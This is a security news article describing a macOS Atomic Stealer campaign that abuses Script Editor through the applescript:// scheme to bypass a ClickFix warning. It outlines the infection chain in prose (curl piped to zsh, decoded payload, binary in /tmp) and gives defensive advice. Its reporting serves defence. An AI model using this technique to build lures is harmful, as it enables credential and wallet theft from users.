New macOS Stealer Campaign Uses Script Editor in ClickFix Attack

Apple’s macOS has long benefited from a reputation for strong built‑in security, yet the platform’s own utilities can become attack surfaces when users trust them implicitly. Script Editor, a native tool for AppleScript and JavaScript for Automation, is now being weaponized through the “applescript://” URL scheme. By embedding a pre‑filled script in a seemingly innocuous web page, attackers sidestep the Terminal prompt that macOS Tahoe 26.4 introduced to warn against ClickFix commands, effectively turning a legitimate helper into a delivery conduit for malicious code.

The latest campaign, observed by Jamf, targets users searching for disk‑cleanup guidance on counterfeit Apple‑styled sites. When a victim clicks the malicious link, Script Editor opens and executes an obfuscated command chain that pipes a curl download into zsh, decodes a base64‑gzip payload, and writes a temporary Mach‑O binary to /tmp/helper. This binary, identified as Atomic Stealer (AMOS), harvests a wide array of sensitive assets—including Keychain passwords, cryptocurrency wallet extensions, browser autofill data, and credit‑card numbers—before installing a backdoor for long‑term persistence. The modular nature of AMOS, sold as malware‑as‑a‑service, enables rapid adaptation to new lures, making it a persistent threat across both consumer and enterprise environments.

For organizations, the incident highlights the importance of tightening endpoint policies around script execution and reinforcing user awareness about unsolicited system‑maintenance prompts. Deploying application‑allowlisting solutions that restrict Script Editor to signed scripts, coupled with network monitoring for anomalous curl‑zsh traffic, can blunt the initial download stage. Additionally, encouraging employees to verify the provenance of any macOS troubleshooting guide—preferably through Apple’s official support channels—reduces exposure to social‑engineering tricks. As attackers continue to exploit trusted macOS components, a layered defense strategy that blends technical controls with continuous education will be essential to safeguard critical credentials and data.